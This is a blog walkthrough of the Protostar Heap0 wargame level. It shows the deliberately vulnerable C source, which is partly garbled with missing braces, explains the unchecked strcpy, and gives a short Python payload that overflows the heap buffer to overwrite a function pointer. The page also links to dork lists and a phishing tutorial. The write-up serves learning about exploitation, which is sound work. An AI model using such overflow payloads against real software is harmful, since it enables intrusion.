Skip to main content

Binary Exploitation Protostar Heap0 - Walkthrough - Writeups

Hello Guyz,

Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap0 Level.

In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];

struct fp {
  int (*fp)();

void winner()
  printf("level passed\n");

void nowinner()
  printf("level has not been passed\n");

int main(int argc, char **argv)
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);



This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Code Review

  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));   <--- Locating Space For data struct
  f = malloc(sizeof(struct fp));     <--- Locating Space For Fp Struct Just After The Data Struct.
  f->fp = nowinner;                  <--- Assign Nowinner Function Pointer To FP Struct

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);          <--- No Input Size verification. 
  f->fp();                           <--- Calling Inner function


As You Can See, In Source Code Their Is Nothing To Verify User Input. Hence, We can Easily Heap Overflow And Write Winner Function Address.


  Heap Overview
 | Name[64]              | FP  |
  Overflow Name And Write Data To FP


import struct
# /opt/protostar/bin/heap0 $(python

buf = "a"*72
win = 0x08048464
ret = struct.pack("I",win)

payload = ''
payload+= buf
payload+= ret
print payload

For More Detailed Walk through Check Below Provided YouTube Video Playlist

Related Post

Top Visited

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

how to install burp suite in Linux/Ubuntu 16.04

Create Simple Packet Sniffer Using Python

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

Best 1000 User-agents List For Web Scraping

How To Install GDB Peda?

2 Easiest Way To Enable Monitor Mode in Kali Linux | Airmon-ng | Iwconfig

Latest Google Dorks List

How To Create Snake Game Using Python And Tkinter - Simple python games